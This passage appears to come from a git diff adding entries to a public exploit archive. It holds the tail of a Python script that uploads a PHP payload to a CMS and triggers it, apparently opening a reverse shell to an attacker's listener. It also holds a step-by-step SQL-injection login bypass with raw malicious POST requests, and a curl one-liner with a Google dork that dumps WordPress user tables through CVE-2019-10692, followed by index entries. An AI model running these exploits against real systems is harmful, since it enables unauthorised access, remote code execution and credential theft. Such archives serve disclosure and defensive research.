>/tmp/f'); ?>".format(LHOST,LPORT) + FORM_DATA = { + 'mode': (None,'filemanager'), + 'file': (FILENAME, PAYLOAD), + 'directory': (None, 'media'), + 'file_name': (None, ''), + 'upload_mode': (None, '1'), + 'resize_xy': (None, 'x'), + 'resize': (None, '640'), + 'compression': (None, '80'), + 'thumbnail_resize_xy': (None, 'x'), + 'thumbnail_resize': (None, '150'), + 'thumbnail_compression': (None, '70'), + 'upload_file_submit': (None, 'OK - Upload file') + } + HEADER_UPLOAD = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': URL_UPLOAD + } + response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD) + if FILENAME in response.text: + print cyan("\n[+] File uploaded and can be found!") + else: + print red("[-] File cannot be found or use different file name!") + sys.exit(-1) + URL_GET = IP + '/media/{0}'.format(FILENAME) + OPTIONS = str(raw_input("Exploit Now (y/n)?")) + print cyan("\nW0rk1ng!!! Enjoy :)") + SESSION.get(URL_GET) \ No newline at end of file diff --git a/exploits/php/webapps/48916.txt b/exploits/php/webapps/48916.txt new file mode 100644 index 000000000..da90b20a6 --- /dev/null +++ b/exploits/php/webapps/48916.txt @@ -0,0 +1,45 @@ +# Title: Mobile Shop System v1.0 - SQLi lead to authentication bypass +# Exploit Author: Moaaz Taha (0xStorm) +# Date: 2020-09-08 +# Vendor Homepage: https://www.sourcecodester.com/php/14412/mobile-shop-system-php-mysql.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14412&title=Mobile+Shop+System+in+PHP+MySQL +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 + +# POC +1- Go to "http://TARGET/mobileshop-master/login.php" or "http://TARGET/mobileshop-master/LoginAsAdmin.php" +2- Inject this SQL payload (test' or 1=1 -- -) in email field and any password in password field. +3- Click on "login", then you will bypass the authentication successfully. + +# Malicious HTTP POST Requests + +POST /mobileshop-master/login.php HTTP/1.1 +Host: 192.168.1.55:8888 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.55:8888/mobileshop-master/login.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 44 +Connection: close +Upgrade-Insecure-Requests: 1 + +email=test%27+or+1%3D1+--+-&password=test123 + +========================================================================== + +POST /mobileshop-master/LoginAsAdmin.php HTTP/1.1 +Host: 192.168.1.55:8888 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.1.55:8888/mobileshop-master/LoginAsAdmin.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 44 +Connection: close +Cookie: PHPSESSID=d7c49f6634a208dca0624f2f6b1d27b6 +Upgrade-Insecure-Requests: 1 + +email=test%27+or+1%3D1+--+-&password=test123 \ No newline at end of file diff --git a/exploits/php/webapps/48918.sh b/exploits/php/webapps/48918.sh new file mode 100755 index 000000000..6d483f528 --- /dev/null +++ b/exploits/php/webapps/48918.sh @@ -0,0 +1,17 @@ +# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection +# Google Dork: inurl:index.php?rest_route=3D/wpgmza/ +# Date: 2020-09-09 +# Exploit Author: Jonatas Fil +# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers +# Software Link: https://wordpress.org/plugins/wp-google-maps/ +# Version: < 7.11.18 +# Tested on: Linux +# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692) +#!/bin/bash + +TARGET="192.168.1.77" + +curl -k --silent +"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&= +fields=3D*+from+wp_users+--+-" +| jq \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a1b83a21d..ba10c71d9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40726,6 +40726,18 @@ id,file,description,date,author,type,platform,port 48905,exploits/php/webapps/48905.txt,"Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)",2020-10-19,Kokn3t,webapps,php, 48906,exploits/php/webapps/48906.py,"Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)",2020-10-19,"Rodolfo Tavares",webapps,php, 48907,exploits/php/webapps/48907.txt,"Textpattern CMS 4.6.2 - Cross-site Request Forgery",2020-10-19,"Alperen Ergel",webapps,php, +48908,exploits/hardware/webapps/48908.py,"Comtrend AR-5387un router - Persistent XSS (Authenticated)",2020-10-20,OscarAkaElvis,webapps,hardware, +48909,exploits/php/webapps/48909.txt,"Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-20,"Akıner Kısa",webapps,php, +48910,exploits/php/webapps/48910.txt,"Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure",2020-10-20,redtimmysec,webapps,php, +48911,exploits/php/webapps/48911.txt,"Visitor Management System in PHP 1.0 - SQL Injection (Authenticated)",2020-10-20,"Rahul Ramkumar",webapps,php, +48912,exploits/php/webapps/48912.py,"Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated)",2020-10-20,nag0mez,webapps,php, +48913,exploits/php/webapps/48913.txt,"WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload",2020-10-20,Net-Hunter,webapps,php, +48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php, +48915,exploits/php/webapps/48915.py,"RiteCMS 2.2.1 - Remote Code Execution (Authenticated)",2020-10-20,H0j3n,webapps,php, +48916,exploits/php/webapps/48916.txt,"Mobile Shop System v1.0 - SQL Injection Authentication Bypass",2020-10-20,"Moaaz Taha",webapps,php, +48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java, +48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php, +48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,